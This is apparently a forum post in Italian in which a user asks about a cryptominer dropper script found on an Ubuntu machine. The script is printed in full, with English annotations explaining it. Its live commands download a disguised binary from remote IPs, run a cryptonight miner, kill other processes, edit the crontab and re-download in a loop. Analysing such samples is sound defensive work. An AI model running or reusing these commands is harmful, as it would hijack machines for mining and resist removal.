Clam ha trovato un file chiamato "kworker34" nella directory /tmp sulla mia macchina Linux Ubuntu. L'ho cancellato subito. Ho trovato anche uno script di shell, kws.sh. Sembra che si connetta a 2 indirizzi IP: uno in Russia e uno in Ucraina.
Qualcuno ha visto questo?
Questo è il contenuto di kwa.sh -
#!/bin/sh
# Analyst annotations on a captured sample; the commands are left exactly as found.
# Summary: a dropper plus watchdog. It downloads a binary to /tmp/kworker34,
# runs it with mining-pool style arguments, then loops forever and re-downloads
# and restarts the binary whenever the process is missing.
# Indicators visible in this script: the files /tmp/conn and /tmp/kworker34, the
# process name "kworker34", the HTTP download host used by wget, the
# stratum+tcp endpoint on port 80, and a third IP address used as a crontab
# filter. How the script reached the host is not shown here.
# NOTE(review): the name "kworker34" resembles kernel worker thread names,
# presumably to blend into a process listing. Unlike real kernel threads it
# has an on-disk executable in /tmp.

# Check whether a process with "kworker34" in its command line already exists.
# $? below is the status of the final grep: 0 means a match was found.
ps -fe|grep kworker34 |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
# Look for the "aes" CPU flag. The test passes when grep exits with anything
# other than 1, i.e. on a match (0) and also on a grep error (2).
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
# Fetch a file named like an image over plain HTTP, then copy everything after
# the first 7664 bytes into /tmp/kworker34 (bs=1 makes skip count bytes).
# NOTE(review): presumably the executable is appended to image data so the
# download passes as a PNG; confirm against a preserved copy of /tmp/conn.
wget 91.235.143.237/miu.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
else
# No "aes" flag: download a different file ("kworker_na") directly.
wget -O /tmp/kworker34 http://91.235.143.237/kworker_na
fi
chmod +x /tmp/kworker34
# Launch detached from the terminal with all output discarded. The arguments
# name the cryptonight algorithm and a stratum+tcp endpoint on port 80.
# NOTE(review): the flags look like a cpuminer-style CPU miner, where -B asks
# for background mode and -u/-p are pool credentials; not verifiable from the
# script alone.
nohup /tmp/kworker34 -B -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
else
echo "runing....."
fi
# Kill every process whose full command line matches "conns" or "irqbalance".
# NOTE(review): irqbalance is also the name of a legitimate system daemon;
# whether the target is that daemon or another program using the name cannot
# be determined from this script.
pkill -f conns
pkill -f irqbalance
# Rewrite the invoking user's crontab without the lines matching this address.
# The dots are unescaped, so each one matches any character.
# NOTE(review): the purpose of this address is not visible here; compare the
# current crontab against a backup, since it has been modified.
crontab -l | sed '/91.230.47.40/d' | crontab -
sleepTime=20
# Watchdog: endless loop that wakes up every $sleepTime seconds. Deleting
# /tmp/kworker34 alone does not stop the activity while this script is still
# running, because the missing process triggers a fresh download.
while [ 0 -lt 1 ]
do
ps -fe| grep kworker34 | grep -v grep
if [ $? -ne 0 ]
then
echo "process not exists ,restart process now... "
# The restart path always uses the miu.png download (no "aes" check) and
# starts the binary without the -B flag used on first launch.
wget 91.235.143.237/miu.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
chmod +x /tmp/kworker34
nohup /tmp/kworker34 -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
echo "restart done ..... "
else
echo "process exists , sleep $sleepTime seconds "
# Process is alive: repeat the process kills and the crontab filtering.
pkill -f conns
pkill -f irqbalance
crontab -l | sed '/91.230.47.40/d' | crontab -
fi
sleep $sleepTime
done